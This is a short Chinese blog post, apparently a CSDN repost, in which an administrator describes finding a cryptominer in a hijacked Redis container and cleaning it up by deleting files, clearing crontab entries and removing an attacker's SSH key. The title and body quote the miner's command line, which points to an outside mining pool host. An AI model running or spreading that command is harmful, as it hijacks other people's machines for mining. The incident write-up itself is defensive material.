记录一次redis被挖矿 ./redis2 --donate-level 1 -o ve01.kieuanilam.me:5555 -u n7re -p n7re -k -B - Go语言中文社区

记录一次redis被挖矿 ./redis2 --donate-level 1 -o ve01.kieuanilam.me:5555 -u n7re -p n7re -k -B


今天在用系统测试,然后又双叒叕运行异常了,看到后台又是redis连接超时,已经连着好几天都是这个错了,然后登录portainer查看,进入redis容器输入redis-cli竟然也是连接超时,无意中点了看了下stats,有一行命令是./redis2 --donate-level 1 -o ve01.kieuanilam.me:5555 -u n7re -p n7re -k -B,很奇怪的命令,问了开发群好像也没人敲这行命令,于是赶忙先重启了redis,然后去找度娘,历经艰辛总算找到有个大哥的博客:腾讯云服务器上挖矿程序处理记录https://blog.csdn.net/wddddddsd/article/details/104734999,情况完全相同,也是有个未知的redis2进程,不过可不是仅仅杀掉那么简单,我照的大哥的步骤找到了包含redis2的路径,不过find / -name redis 不行,要用locate redis2,我不知道为什么,进去tmp文件夹下确实有backup.db的脚本,有几行不知道哪里的ip地址

胆战心惊,立马删掉tmp文件夹,还没完。而且那些可疑的进程redis2、kinsing、kdev竟然杀不掉,接着找度娘,找到另一篇博客:记一次服务器被挖矿程序占用的解决过程

https://blog.csdn.net/dabao87/article/details/81302991 ,照着做,crontab -l 清掉定时任务,然后进入.ssh再删除authorized_keys,坏人留下的公钥,这才清除完了。redis安全应当重视,设密码!设密码!设密码!

版权声明:本文来源CSDN,感谢博主原创文章,遵循 CC 4.0 by-sa 版权协议,转载请附上原文出处链接和本声明。
原文链接:https://blog.csdn.net/dingchaochao_9110/article/details/108735090
站方申明:本站部分内容来自社区用户分享,若涉及侵权,请联系站方删除。
  • 发表于 2021-06-20 18:33:07
  • 阅读 ( 844 )
  • 分类:Redis

0 条评论

请先 登录 后评论

官方社群

GO教程

猜你喜欢